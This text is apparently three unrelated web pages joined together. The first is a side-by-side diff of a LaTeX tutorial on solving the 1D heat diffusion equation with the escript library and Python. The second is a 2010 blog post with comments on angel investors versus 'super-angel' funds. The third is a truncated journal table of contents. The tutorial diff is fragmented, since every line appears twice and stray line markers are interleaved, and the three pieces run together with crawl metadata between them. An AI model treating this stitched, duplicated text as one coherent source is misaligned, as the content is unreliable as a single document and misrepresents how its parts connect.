conduction. With time the bar will reach a constant temperature equivalent to the heat source. 25  \subsection{1D Heat Diffusion Equation}  \subsection{1D Heat Diffusion Equation} 26  We can model the heat distribution of this problem over time using the one dimensional heat diffusion equation\footnote{A detailed discussion on how the heat diffusion equation is derived can be found at \url{http://online.redwoods.edu/instruct/darnold/DEProj/sp02/AbeRichards/paper.pdf}};  We can model the heat distribution of this problem over time using the one dimensional heat diffusion equation\footnote{A detailed discussion on how the heat diffusion equation is derived can be found at \url{http://online.redwoods.edu/instruct/darnold/DEProj/sp02/AbeRichards/paper.pdf}}; 27  which is defined as:  which is defined as: # Line 33  which is defined as: Line 32  which is defined as: 32  where $\rho$ is the material density, $c\hackscore p$ is the specific heat and $\kappa$ is the thermal conductivity constant for a given material\footnote{A list of some common thermal conductivities is available from Wikipedia \url{http://en.wikipedia.org/wiki/List_of_thermal_conductivities}}.  where $\rho$ is the material density, $c\hackscore p$ is the specific heat and $\kappa$ is the thermal conductivity constant for a given material\footnote{A list of some common thermal conductivities is available from Wikipedia \url{http://en.wikipedia.org/wiki/List_of_thermal_conductivities}}. 33  The heat source is defined by the right hand side of \ref{eqn:hd} as $q\hackscore{H}$; this can take the form of a constant or a function of time and space. For example $q\hackscore{H} = Te^{-\gamma t}$ where we have the output of our heat source decaying with time. There are also two partial derivatives in \ref{eqn:hd}; $\frac{\partial T}{\partial t}$ describes the change in temperature with time while $\frac{\partial ^2 T}{\partial x^2}$ is the spatial change of temperature. As there is only a single spatial dimension to our problem, our temperature solution $T$ is only dependent on the time $t$ and our position along the iron bar $x$.  The heat source is defined by the right hand side of \ref{eqn:hd} as $q\hackscore{H}$; this can take the form of a constant or a function of time and space. For example $q\hackscore{H} = Te^{-\gamma t}$ where we have the output of our heat source decaying with time. There are also two partial derivatives in \ref{eqn:hd}; $\frac{\partial T}{\partial t}$ describes the change in temperature with time while $\frac{\partial ^2 T}{\partial x^2}$ is the spatial change of temperature. As there is only a single spatial dimension to our problem, our temperature solution $T$ is only dependent on the time $t$ and our position along the iron bar $x$. 34 35  \subsection{Escript, PDEs and The General Form}  \subsection{\esc, PDEs and The General Form} 36  Potentially, it is now possible to solve \ref{eqn:hd} analytically and this would produce an exact solution to our problem. However, it is not always possible or practical to solve a problem this way. Alternatively, computers can be used to solve these kinds of problems when a large number of sums or a more complex visualisation is required. To do this, a numerical approach is required - \esc can help us here -  and it becomes necessary to discretize the equation so that we are left with a finite number of equations for a finite number of spatial and time steps in the model. While discretization introduces approximations and a degree of error, we find that a sufficiently sampled model is generally accurate enough for the requirements of the modeller.  Potentially, it is now possible to solve \ref{eqn:hd} analytically and this would produce an exact solution to our problem. However, it is not always possible or practical to solve a problem this way. Alternatively, computers can be used to solve these kinds of problems when a large number of sums or a more complex visualisation is required. To do this, a numerical approach is required - \esc can help us here -  and it becomes necessary to discretize the equation so that we are left with a finite number of equations for a finite number of spatial and time steps in the model. While discretization introduces approximations and a degree of error, we find that a sufficiently sampled model is generally accurate enough for the requirements of the modeller. 37 38  \esc interfaces with any given PDE via a general form. In this example we will illustrate a simpler version of the full linear PDE general form which is available in the \esc user's guide. A simplified form that suits our heat diffusion problem\footnote{In the form of the \esc users guide which using the Einstein convention is written as  \esc interfaces with any given PDE via a general form. In this example we will illustrate a simpler version of the full linear PDE general form which is available in the \esc user's guide. A simplified form that suits our heat diffusion problem\footnote{In the form of the \esc users guide which using the Einstein convention is written as # Line 95  T(x,0) = T\hackscore{ref} = 0 Line 94  T(x,0) = T\hackscore{ref} = 0 94  for all $x$ in the domain.  for all $x$ in the domain. 95 96  \subsection{Boundary Conditions}  \subsection{Boundary Conditions} 97  With the PDE sufficiently modified, consideration must now be given to the boundary conditions of our model. Typically there are two main types of boundary conditions known as Neumann and Dirichlet\footnote{More information on Boundary Conditions is available at Wikipedia \url{http://en.wikipedia.org/wiki/Boundary_conditions}}. In this example, we have utilised both conditions. Dirichlet is conceptually simpler and is used to prescribe a known value to the model on its boundary. This is like holding a snake by the tail; we know where the tail will be as we hold it however, we have no control over the rest of the snake. Dirichlet boundary conditions exist where we have applied our heat source. As the heat source is a constant, we can simulate its presence on that boundary. This is done by continuously resetting the temperature of the boundary, so that is is the same as the heat source.    With the PDE sufficiently modified, consideration must now be given to the boundary conditions of our model. Typically there are two main types of boundary conditions known as Neumann and Dirichlet\footnote{More information on Boundary Conditions is available at Wikipedia \url{http://en.wikipedia.org/wiki/Boundary_conditions}}. In this example, we have utilised both conditions. Dirichlet is conceptually simpler and is used to prescribe a known value to the model on its boundary. For this model Dirichlet boundary conditions exist where we have applied our heat source. As the heat source is a constant, we can simulate its presence on that boundary. This is done by continuously resetting the temperature of the boundary, so that it is the same as the heat source. 98 99    Neumann boundary conditions describe the radiation or flux that is normal to the boundary surface. This aptly describes our insulation conditions as we do not want to exert a constant temperature as with the heat source. However, we do want to prevent any loss of energy from the system. 100 101  Neumann boundary conditions describe the radiation or flux normal to the boundary surface. This aptly describes our insulation conditions as we do not want to exert a constant temperature as with the heat source. However, we do want to prevent any loss of energy from the system. These natural boundary conditions can be described by specifying a radiation condition which prescribes the normal component of the flux $\kappa T\hackscore{,i}$ to be proportional  While the flux for this model is zero, it is important to note the requirements for Neumann boundary conditions. For heat diffusion these can be described by specifying a radiation condition which prescribes the normal component of the flux $\kappa T\hackscore{,i}$ to be proportional 102  to the difference of the current temperature to the surrounding temperature $T\hackscore{ref}$; in general terms this is;  to the difference of the current temperature to the surrounding temperature $T\hackscore{ref}$; in general terms this is; 103 104   \kappa T\hackscore{,i} \hat{n}\hackscore i = \eta (T\hackscore{ref}-T)   \kappa T\hackscore{,i} \hat{n}\hackscore i = \eta (T\hackscore{ref}-T) # Line 128  A\hackscore{00}=A; A\hackscore{01}=A\hac Line 129  A\hackscore{00}=A; A\hackscore{01}=A\hac 129 130 131  \subsection{Developing a PDE Solution Script}  \subsection{Developing a PDE Solution Script} 132  To solve \ref{eqn:hd} we will write a simple python script which uses the \modescript, \modfinley and \modmpl modules. At this point we assume that you have some basic understanding of the python programming language. If not there are some pointers and links available in Section \ref{sec:escpybas} .  \label{sec:key} 133    To solve the heat diffusion equation (equation \ref{eqn:hd}) we will write a simple \pyt script which uses the \modescript, \modfinley and \modmpl modules. At this point we assume that you have some basic understanding of the \pyt programming language. If not there are some pointers and links available in Section \ref{sec:escpybas} . 134 135  Our goal here is to develop a script for \esc that will solve the heat equation at successive time steps for a predefined period using our general form \ref{eqn:hdgenf}. Firstly it is necessary to import all the libraries\footnote{The libraries contain predefined scripts that are required to solve certain problems, these can be simple like sin and cos functions or more complicated like those from our \esc library.}  By developing a script for \esc, the heat diffusion equation can be solved at successive time steps for a predefined period using our general form \ref{eqn:hdgenf}. Firstly it is necessary to import all the libraries\footnote{The libraries contain predefined scripts that are required to solve certain problems, these can be simple like $sine$ and $cosine$ functions or more complicated like those from our \esc library.} 136  that we will require.  that we will require. 137  \begin{python}  \begin{python} 138  from esys.escript import *  from esys.escript import * # Line 145  import pylab as pl #Plotting package. Line 147  import pylab as pl #Plotting package. 147  import numpy as np #Array package.  import numpy as np #Array package. 148  import os #This package is necessary to handle saving our data.  import os #This package is necessary to handle saving our data. 149  \end{python}  \end{python} 150  It is generally a good idea to import all of the \modescript library, although if you know the packages you need you can specify them individually. The function \verb|LinearPDE| has been imported for ease of use later in the script. \verb|Rectangle| is going to be our type of domain. The package \verb unitsSI  is a module of \esc that provides support for units definitions with our variables; and the \verb|os| package is needed to handle file outputs once our PDE has been solved. \verb pylab  and \verb numpy  are modules developed independently of \esc. They are used because they have efficient plotting and array handling capabilities.  It is generally a good idea to import all of the \modescript library, although if the functions and classes required are known they can be specified individually. The function \verb|LinearPDE| has been imported explicitly for ease of use later in the script. \verb|Rectangle| is going to be our type of model. The module \verb unitsSI  provides support for SI unit definitions with our variables; and the \verb|os| module is needed to handle file outputs once our PDE has been solved. \verb pylab  and \verb numpy  are modules developed independently of \esc. They are used because they have efficient plotting and array handling capabilities. 151 152  Once our library dependencies have been established, defining the problem specific variables is the next step. In general the number of variables needed will vary between problems. These variables belong to two categories. They are either directly related to the PDE and can be used as inputs into the \esc solver, or they are script variables used to control internal functions and iterations in our problem. For this PDE there are a number of constants which will need values. Firstly, the domain upon which we wish to solve our problem needs to be defined. There are many different types of domains in \modescript which we will demonstrate in later tutorials but for our iron rod, we will simply use a rectangular domain.  Once our library dependencies have been established, defining the problem specific variables is the next step. In general the number of variables needed will vary between problems. These variables belong to two categories. They are either directly related to the PDE and can be used as inputs into the \esc solver, or they are script variables used to control internal functions and iterations in our problem. For this PDE there are a number of constants which will need values. Firstly, the model upon which we wish to solve our problem needs to be defined. There are many different types of models in \modescript which we will demonstrate in later tutorials but for our iron rod, we will simply use a rectangular model. 153 154  Using a rectangular domain simplifies our rod which would be a \textit{3D} object, into a single dimension. The iron rod will have a lengthways cross section that looks like a rectangle.  As a result we do not need to model the volume of the rod because a cylinder is symmetrical about its centre. There are four arguments we must consider when we decide to create a rectangular domain, the model \textit{length}, \textit{width} and \textit{step size} in each direction. When defining the size of our problem it will help us determine appropriate values for our domain arguments. If we make our dimensions large but our step sizes very small we will to a point, increase the accuracy of our solution. Unfortunately we also increase the number of calculations that must be solved per time step. This means more computational time is required to produce a solution. In our \textit{1D} problem we will define our bar as being 1 metre long. An appropriate \verb|ndx| would be 1 to 10\% of the length. Our \verb|ndy| need only be 1, This is because our problem stipulates no partial derivatives in the $y$ direction so the temperature does not vary with $y$. Thus the domain parameters can be defined as follows; note we have used the \verb unitsSI  convention to make sure all our input units are converted to SI.  Using a rectangular model simplifies our rod which would be a \textit{3D} object, into a single dimension. The iron rod will have a lengthways cross section that looks like a rectangle.  As a result we do not need to model the volume of the rod because a cylinder is symmetrical about its centre. There are four arguments we must consider when we decide to create a rectangular model, the model \textit{length}, \textit{width} and \textit{step size} in each direction. When defining the size of our problem it will help us determine appropriate values for our model arguments. If we make our dimensions large but our step sizes very small we will to a point, increase the accuracy of our solution. Unfortunately we also increase the number of calculations that must be solved per time step. This means more computational time is required to produce a solution. In this \textit{1D} problem, the bar is defined as being 1 metre long. An appropriate step size \verb|ndx| would be 1 to 10\% of the length. Our \verb|ndy| need only be 1, this is because our problem stipulates no partial derivatives in the $y$ direction. Thus the temperature does not vary with $y$. Hence, the model parameters can be defined as follows; note we have used the \verb unitsSI  convention to make sure all our input units are converted to SI. 155  \begin{python}  \begin{python} 156  #Domain related.  #Domain related. 157  mx = 1*m #meters - model length  mx = 1*m #meters - model length # Line 184  Now that we know our inputs we will buil Line 186  Now that we know our inputs we will buil 186  #generate domain using rectangle  #generate domain using rectangle 187  rod = Rectangle(l0=mx,l1=my,n0=ndx, n1=ndy)  rod = Rectangle(l0=mx,l1=my,n0=ndx, n1=ndy) 188  \end{python}  \end{python} 189  \verb rod  now describes a domain in the manner of Section \ref{ss:domcon}. As we define our variables, various function spaces will be created to accomodate them. There is an easy way to extract finite points from the domain \verb|rod| using the domain property function \verb|getX()| . This function sets the vertices of each cell as finite points to solve in the solution. If we let \verb|x| be these finite points, then;  \verb rod  now describes a domain in the manner of Section \ref{ss:domcon}. As we define our variables, various function spaces will be created to accommodate them. There is an easy way to extract finite points from the domain \verb|rod| using the domain property function \verb|getX()| . This function sets the vertices of each cell as finite points to solve in the solution. If we let \verb|x| be these finite points, then; 190  \begin{python}  \begin{python} 191  #extract finite points - the solution points  #extract finite points - the solution points 192  x=rod.getX()  x=rod.getX() 193  \end{python}  \end{python} 194  The data locations of specific function spaces can be returned in a similar manner by extracting the relevent function space from the domain followed by the \verb .getX()  operator.  The data locations of specific function spaces can be returned in a similar manner by extracting the relevant function space from the domain followed by the \verb .getX()  operator. 195 196  With a domain and all our required variables established, it is now possible to set up our PDE so that it can be solved by \esc. The first step is to define the type of PDE that we are trying to solve in each time step. In this example it is a single linear PDE\footnote{in comparison to a system of PDEs which will be discussed later.}. We also need to state the values of our general form variables.  With a domain and all our required variables established, it is now possible to set up our PDE so that it can be solved by \esc. The first step is to define the type of PDE that we are trying to solve in each time step. In this example it is a single linear PDE\footnote{in comparison to a system of PDEs which will be discussed later.}. We also need to state the values of our general form variables. 197  \begin{python}  \begin{python} # Line 201  In a few special cases it may be possibl Line 203  In a few special cases it may be possibl 203  \label{eqn:symm}  \label{eqn:symm} 204  A\hackscore{jl}=A\hackscore{lj}  A\hackscore{jl}=A\hackscore{lj} 205 206  Symmetry is only dependent on the $A$ coefficient in the general form and the others $D$ and $d$ as well as the RHS coefficients $Y$ and $y$ may take any value. From the above definition we can see that our PDE is symmetric. The \verb LinearPDE  class provides the method \method{checkSymmetry} to check if the given PDE is symmetric. As our PDE is symmetrical we will enable symmetry via;  Symmetry is only dependent on the $A$ coefficient in the general form and the other coefficients $D$ and $d$ as well as the RHS $Y$ and $y$ may take any value. From the above definition we can see that our PDE is symmetric. The \verb LinearPDE  class provides the method \method{checkSymmetry} to check if the given PDE is symmetric. As our PDE is symmetrical we will enable symmetry via; 207  \begin{python}  \begin{python} 208   myPDE.setSymmetryOn()   myPDE.setSymmetryOn() 209  \end{python}  \end{python} 210 211  We now need to specify our boundary conditions and initial values. The initial values required to solve this PDE are temperatures for each discrete point in our domain. We will set our bar to:  We now need to specify our boundary conditions and initial values. The initial values required to solve this PDE are temperatures for each discrete point in our model. We will set our bar to: 212  \begin{python}  \begin{python} 213   T = Tref   T = Tref 214  \end{python}  \end{python} 215  Boundary conditions are a little more difficult. Fortunately the escript solver will handle our insulated boundary conditions by default with a zero flux operator. However, we will need to apply our heat source $q_{H}$ to the end of the bar at $x=0$ . \esc makes this easy by letting us define areas in our domain. The finite points in the domain were previously defined as \verb x  and it is possible to set all of points that satisfy $x=0$ to \verb q  via the \verb whereZero()  function. There are a few \verb where  functions available in \esc. They will return a value \verb 1  where they are satisfied and \verb 0  where they are not. In this case our \verb qH  is only applied to the far LHS of our model as required.  Boundary conditions are a little more difficult. Fortunately the \esc solver will handle our insulated boundary conditions by default with a zero flux operator. However, we will need to apply our heat source $q_{H}$ to the end of the bar at $x=0$ . \esc makes this easy by letting us define areas in our model. The finite points in the model were previously defined as \verb x  and it is possible to set all of points that satisfy $x=0$ to \verb q  via the \verb whereZero()  function. There are a few \verb where  functions available in \esc. They will return a value \verb 1  where they are satisfied and \verb 0  where they are not. In this case our \verb qH  is only applied to the far LHS of our model as required. 216  \begin{python}  \begin{python} 217  # ... set heat source: ....  # ... set heat source: .... 218  qH=q*whereZero(x[0])  qH=q*whereZero(x[0]) 219  \end{python}  \end{python} 220 221  Finally we will initialise an iteration loop to solve our PDE for all the time steps we specified in the variable section. As the RHS of the general form is dependent on the previous values for temperature \verb T  across the bar this must be updated in the loop. Our output at each timestep is \verb T  the heat distribution and \verb totT  the total heat in the system.  Finally we will initialise an iteration loop to solve our PDE for all the time steps we specified in the variable section. As the RHS of the general form is dependent on the previous values for temperature \verb T  across the bar this must be updated in the loop. Our output at each time step is \verb T  the heat distribution and \verb totT  the total heat in the system. 222  \begin{python}  \begin{python} 223  while t<=tend:  while t<=tend: 224      i+=1 #increment the counter      i+=1 #increment the counter # Line 227  while t<=tend: Line 229  while t<=tend: 229  \end{python}  \end{python} 230 231  \subsection{Plotting the heat solutions}  \subsection{Plotting the heat solutions} 232  Visualisation of the solution can be achieved using \mpl a module contained with \pylab. We start by modifying our solution script from before. Prior to the \verb while  loop we will need to extract our finite solution points to a data object that is compatible with \mpl. First it is necessary to convert \verb x  to a list of tuples. These are then converted to a \numpy array and the $x$ locations extracted via an array slice to the variable \verb plx  .  Visualisation of the solution can be achieved using \mpl a module contained within \pylab. We start by modifying our solution script from before. Prior to the \verb while  loop we will need to extract our finite solution points to a data object that is compatible with \mpl. First it is necessary to convert \verb x  to a list of tuples. These are then converted to a \numpy array and the $x$ locations extracted via an array slice to the variable \verb plx  . 233  \begin{python}  \begin{python} 234  #convert solution points for plotting  #convert solution points for plotting 235  plx = x.toListOfTuples()  plx = x.toListOfTuples() 236  plx = np.array(plx) #convert to tuple to numpy array  plx = np.array(plx) #convert to tuple to numpy array 237  plx = plx[:,0] #extract x locations  plx = plx[:,0] #extract x locations 238  \end{python}  \end{python} 239  As there are two solution outputs, we will generate two plots and save each to a file for every time step in the solution. The following is appended to the end of the \verb while  loop and creates two figures. The first figure is for the temperature distribution, and the second the total temperature in the bar. Both cases are similar with a few minor changes for scale and labelling. We start by converting the solution to a tuple and then plotting this against our \textit{x coordinates} \verb plx  from before. The axis is then standardised and a title applied. The figure is then saved to a *.png file and cleared for the following iteration.  As there are two solution outputs, we will generate two plots and save each to a file for every time step in the solution. The following is appended to the end of the \verb while  loop and creates two figures. The first figure is for the temperature distribution, and the second the total temperature in the bar. Both cases are similar with a few minor changes for scale and labelling. We start by converting the solution to a tuple and then plotting this against our \textit{x coordinates} \verb plx  from before. The axis is then standardised and a title applied. Finally, the figure is saved to a *.png file and cleared for the following iteration. 240  \begin{python}  \begin{python} 241      #establish figure 1 for temperature vs x plots      #establish figure 1 for temperature vs x plots 242      tempT = T.toListOfTuples(scalarastuple=False)      tempT = T.toListOfTuples(scalarastuple=False) # Line 252  As there are two solution outputs, we wi Line 254  As there are two solution outputs, we wi 254      pl.figure(2)      pl.figure(2) 255      pl.plot(plx,tottempT)      pl.plot(plx,tottempT) 256      pl.axis([0,1.0,9.657E08,12000+9.657E08])      pl.axis([0,1.0,9.657E08,12000+9.657E08]) 257      pl.title("Total temperature accross Rod")      pl.title("Total temperature across Rod") 258      pl.savefig(os.path.join(save_path+"/totT","ttrodpyplot%03d.png")%i)      pl.savefig(os.path.join(save_path+"/totT","ttrodpyplot%03d.png")%i) 259      pl.clf()      pl.clf() 260  \end{python}  \end{python} # Line 265  As there are two solution outputs, we wi Line 267  As there are two solution outputs, we wi 267  \end{figure}  \end{figure} 268 269  \subsubsection{Parallel scripts (MPI)}  \subsubsection{Parallel scripts (MPI)} 270  In some of the example files for this cookbook the plot part of the script looks a little different.  In some of the example files for this cookbook the plotting commands are a little different. 271  For example,  For example, 272  \begin{python}  \begin{python} pl.title("Total temperature accross Rod") 273      if getMPIRankWorld() == 0:      if getMPIRankWorld() == 0: 274          pl.savefig(os.path.join(save_path+"/totT","ttrodpyplot%03d.png")%i)          pl.savefig(os.path.join(save_path+"/totT","ttrodpyplot%03d.png")%i) 275      pl.clf()          pl.clf() # Line 277  For example, Line 278  For example, 278  The additional \verb if  statement is not necessary for normal desktop use.  The additional \verb if  statement is not necessary for normal desktop use. 279  It becomes important for scripts run on parallel computers.  It becomes important for scripts run on parallel computers. 280  Its purpose is to ensure that only one copy of the file is written.  Its purpose is to ensure that only one copy of the file is written. 281  For more details on writing scripts for parallel computers please consult the \emph{user's guide}.  For more details on writing scripts for parallel computing please consult the \emph{user's guide}. 282 283  \subsection{Make a video}  \subsection{Make a video} 284  Our saved plots from the previous section can be cast into a video using the following command appended to the end of the script. \verb mencoder  is linux only however, and other platform users will need to use an alternative video encoder.  Our saved plots from the previous section can be cast into a video using the following command appended to the end of the script. \verb mencoder  is linux only however, and other platform users will need to use an alternative video encoder. Legend: Removed from v.2800 changed lines Added in v.2801
2020-02-24 15:55:39
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7319165468215942, "perplexity": 1251.5409769837058}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145960.92/warc/CC-MAIN-20200224132646-20200224162646-00416.warc.gz"}
http://reactionwheel.net/2010/09/opm.html
## OPM Frames are disabled on this site. I think Chris Dixon is one of the smartest investors around.  I co-invested in him when he was an angel and I’ve co-invested with his early stage fund, Founder’s Collective.  But while I generally agree with his recent post on venture investing segmentation, I need to call bull on this: What we are witnessing now is a the VC industry segmenting as it matures. Mentorship and angel funding are performed more effectively by specialized firms. It’s kind of surprising to me that someone who did such an excellent job as an angel would imply that he really wasn’t the best investor for those companies in the first place but, hey, he’s entitled to his opinion.  But saying you’d be a better angel if you were a firm is like saying that you’d be a better amateur athlete if you went pro*.  You can’t be an angel if you have a fund.  And though this sounds like a semantic argument, it make a real-world difference to entrepreneurs. What bothers me is the lumping of angel motivation and technique in with the “Super-Angel”/micro-VC motivations and techniques.  The otherwise excellent David Lerner makes this mistake when he says he intends to explicate the angel investing world and then lists, as half his angels, people with funds.  This is a fundamental analytical mistake: taking the average of a bimodal distribution tells you nothing very interesting at all. There are reasons why angels existed in the first place.  While the lower cost of getting a startup from A to B has changed the dynamics of early stage rounds, it hasn’t changed most of the fundamental advantages of having individuals investing their own money: a personal–rather than institutional–connection to entrepreneurs, the ability to make quick decisions, the ability to make decisions that may not seem fiduciarily responsible but are for the greater good, primary expertise in an industry and in company building rather than in money-management, etc.  Most importantly–despite what the Supreme Court may think–firms are not people and they don’t, in the long run, act like people.  Angels do. —– * While this is the reasoning behind the modern Olympics and many college football programs, it flies in the face of the actual meaning of “amateur” and destroys what makes amateur athletics so appealing. 1. Jerry, Agreed – I need a mentor, teacher and advocate. Not a bank. Excellently put. 2. chris dixon says: Hey Jerry – I think I wasn’t clear. I meant the emphasis to be on “specialized” vs “general”, not “firms” vs “individuals.” I was arguing for the need for specialized early stage firms (“superangels”). I think individual angels play a very important role. Almost all of our deals include them and we actively encourage entrepreneurs to do so. And I also think pure angel rounds are a great thing for entrepreneurs and innovation in general. -chris dixon 3. Chris–Thanks for the clarification. Sorry for using you as a stalking horse :) Jeff–You might need both, you never know… every company is different. I like the VCs and when I see a company I really like I often try to pull one in, because it’s usually the case that I can’t do the whole round by myself and pulling together enough $50k checks to do a$500k round can be time consuming. In most of the early-stage companies I see (and keep in mind the selection bias here) companies move from needing more advice/specialized expertise and less money to needing more money and less outside expertise. This argues for the segmentation that Chris blogged about. Sometimes that outside expertise can come from a YCombinator or a Betaworks, but what they can help you with resides in the scope of the people running them. If you need knowledge of something a bit more esoteric (the market for selling data to adnets, DSPs and agencies, say) you won’t find that in the incubators, IMHO. Every person, every incubator exec, every VC, every angel can only know so much. And usually they have either breadth or depth, there’s a bandwidth constraint on any person’s ability to take in information. Incubators provides deep expertise in broadly needed areas. In most emerging, industry-specific areas they do not. In those cases you find some angels. 4. Thank you Jerry. I’m still hunting. I need two niche mentors. Not easy. Thanks for the insight. It was very helpful.
2017-03-23 04:19:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18917371332645416, "perplexity": 2908.161832792658}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218186774.43/warc/CC-MAIN-20170322212946-00572-ip-10-233-31-227.ec2.internal.warc.gz"}
http://ieeexplore.ieee.org/xpl/tocresult.jsp?reload=true&isnumber=5350927
# IEEE Transactions on Instrumentation and Measurement ## Filter Results Displaying Results 1 - 25 of 36 Publication Year: 2010, Page(s):C1 - 1 | |PDF (51 KB) • ### IEEE Transactions on Instrumentation and Measurement publication information Publication Year: 2010, Page(s): C2 | |PDF (45 KB) • ### Special Section on the 2008 Advanced Methods for Uncertainty Estimation in Measurement Workshop Publication Year: 2010, Page(s):2 - 3 | |PDF (52 KB) | HTML • ### Reducing Uncertainty With Seismic Measurements While Drilling Publication Year: 2010, Page(s):4 - 14 Cited by:  Papers (7) | |PDF (2008 KB) | HTML This paper discusses both seismic checkshot data inversion and seismic waveform look-ahead imaging while drilling. We investigate the estimation under real-time data uncertainties of interval velocity profiles calculated from checkshot measurements acquired while drilling. It is found that real-time checkshots may suffer from downhole time-picking errors in addition to an unpredictable clock drift... View full abstract» • ### How to Process the Random Part of RFVs: Comparison of Available Methods and New Proposal Publication Year: 2010, Page(s):15 - 26 Cited by:  Papers (10) | |PDF (524 KB) | HTML In the recent years, fuzzy variables (FVs) and random-fuzzy variables (RFVs) have been proposed to represent the measurement results with their associated uncertainty. However, up to now, the different authors do not yet agree in the mathematical way FVs should be composed together, so different approaches have been proposed. This paper compares these approaches to find their advantages and disadv... View full abstract» • ### Uncertainty Modeling and Propagation Through RFVs for the Assessment of CADx Systems in Digital Mammography Publication Year: 2010, Page(s):27 - 38 Cited by:  Papers (6) | |PDF (1367 KB) | HTML In this paper, we consider uncertainty handling and propagation by means of random fuzzy variables (RFVs) through a computer-aided-diagnosis (CADx) system for the early diagnosis of breast cancer. In particular, the denoising and the contrast enhancement of microcalcifications is specifically addressed, providing a novel methodology for separating the foreground and the background in the image to ... View full abstract» • ### Transformation of Bimodal Probability Distributions Into Possibility Distributions Publication Year: 2010, Page(s):39 - 47 Cited by:  Papers (4) | |PDF (744 KB) | HTML At the application level, it is important to be able to define the measurement result as an interval that will contain an important part of the distribution of the measured values, that is, a coverage interval. This practice acknowledged by the International Organization for Standardization (ISO) Guide is a major shift from the probabilistic representation. It can be viewed as a probability/possib... View full abstract» • ### Extending Polynomial Chaos to Include Interval Analysis Publication Year: 2010, Page(s):48 - 55 Cited by:  Papers (9) | |PDF (595 KB) | HTML Polynomial chaos theory (PCT) has been proven to be an efficient and effective way to represent and propagate uncertainty through system models and algorithms in general. In particular, PCT is a computationally efficient way to analyze and solve dynamic models under uncertainty. This paper presents a new way to use a polynomial expansion to incorporate uncertainties that are not expressed in terms... View full abstract» • ### Measuring and Extraction of Biological Information on New Handheld Biochip-Based Microsystem Publication Year: 2010, Page(s):56 - 62 Cited by:  Papers (1)  |  Patents (1) | |PDF (809 KB) | HTML This paper proposes techniques for the extraction of biological information in a recently developed handheld biochip-based microsystem. The microsystem is based on a magnetoresistive array biochip composed of a number of sensing sites with magnetic tunneling junctions (MTJ) and diodes. Different techniques are addressed to drive the MTJs with different types of signals. Different filtering strateg... View full abstract» • ### FPGA-Based Multiple-Channel Vibration Analyzer for Industrial Applications in Induction Motor Failure Detection Publication Year: 2010, Page(s):63 - 72 Cited by:  Papers (41) | |PDF (1194 KB) | HTML Early detection of failures in equipment is one of the most important concerns to industry. Many techniques have been developed for early failure detection in induction motors. There is the necessity of low-cost instrumentation for online multichannel measurement and analysis of vibration in the frequency domain, and this could be fixed to the machine for continuous monitoring to provide a reliabl... View full abstract» • ### A Low-Cost Voltage-to-Current Calibration Technique for Multiple-Sensor Systems Publication Year: 2010, Page(s):73 - 77 Cited by:  Papers (2) | |PDF (135 KB) | HTML Systems with multiple sensors pose a problem of heterogeneity, i.e., different sensors have different outputs subject to the same excitation. To tackle this problem, this paper presents a calibration technique for multiple-sensor applications. An array of voltage-to-current converters, followed by a summing inverter, is employed to aggregate the responses of the system, which originated from heter... View full abstract» • ### Helmholtz-Type Regularization Method for Permittivity Reconstruction Using Experimental Phantom Data of Electrical Capacitance Tomography Publication Year: 2010, Page(s):78 - 83 Cited by:  Papers (14) | |PDF (570 KB) | HTML Electrical capacitance tomography (ECT) attempts to image the permittivity distribution of an object by measuring the electrical capacitance between sets of electrodes placed around its periphery. Image reconstruction in ECT is a nonlinear ill-posed inverse problem, and regularization methods are needed to stabilize this inverse problem. The reconstruction of complex shapes (sharp edges) and absol... View full abstract» • ### Tool for Automated Instruction Set Characterization for Software Power Estimation Publication Year: 2010, Page(s):84 - 91 Cited by:  Papers (2) | |PDF (1114 KB) | HTML The complexity and functionality of mobile digital devices is continuously growing. This results in a higher energy consumption of such devices. To counteract this trend, it is mandatory to accomplish software power optimizations based on accurate power consumption models characterized for the processor. This paper presents an environment for automated instruction set characterization based on phy... View full abstract» • ### On the Modeling of New Tunnel Junction Magnetoresistive Biosensors Publication Year: 2010, Page(s):92 - 100 Cited by:  Papers (3) | |PDF (869 KB) | HTML A fully integrated biochip based on a 16 ?? 16 scalable matrix structure of aluminum oxide magnetic tunnel junctions (MTJs) and thin-film diodes (TFDs of hydrogenated amorphous silicon) was fabricated and included as the biosensor of a portable handheld microsystem developed for biomolecular recognition detection using magnetic labels [deoxyribonucleic acid (DNA) hybridization, antibody antigen in... View full abstract» • ### Constructing Online Testable Circuits Using Reversible Logic Publication Year: 2010, Page(s):101 - 109 Cited by:  Papers (34) | |PDF (239 KB) | HTML With the advent of nanometer technology, circuits are more prone to transient faults that can occur during its operation. Of the different types of transient faults reported in the literature, the single-event upset (SEU) is prominent. Traditional techniques such as triple-modular redundancy (TMR) consume large area and power. Reversible logic has been gaining interest in the recent past due to it... View full abstract» • ### Ultrasound Transducers for Large-Scale Metrology: A Performance Analysis for Their Use by the 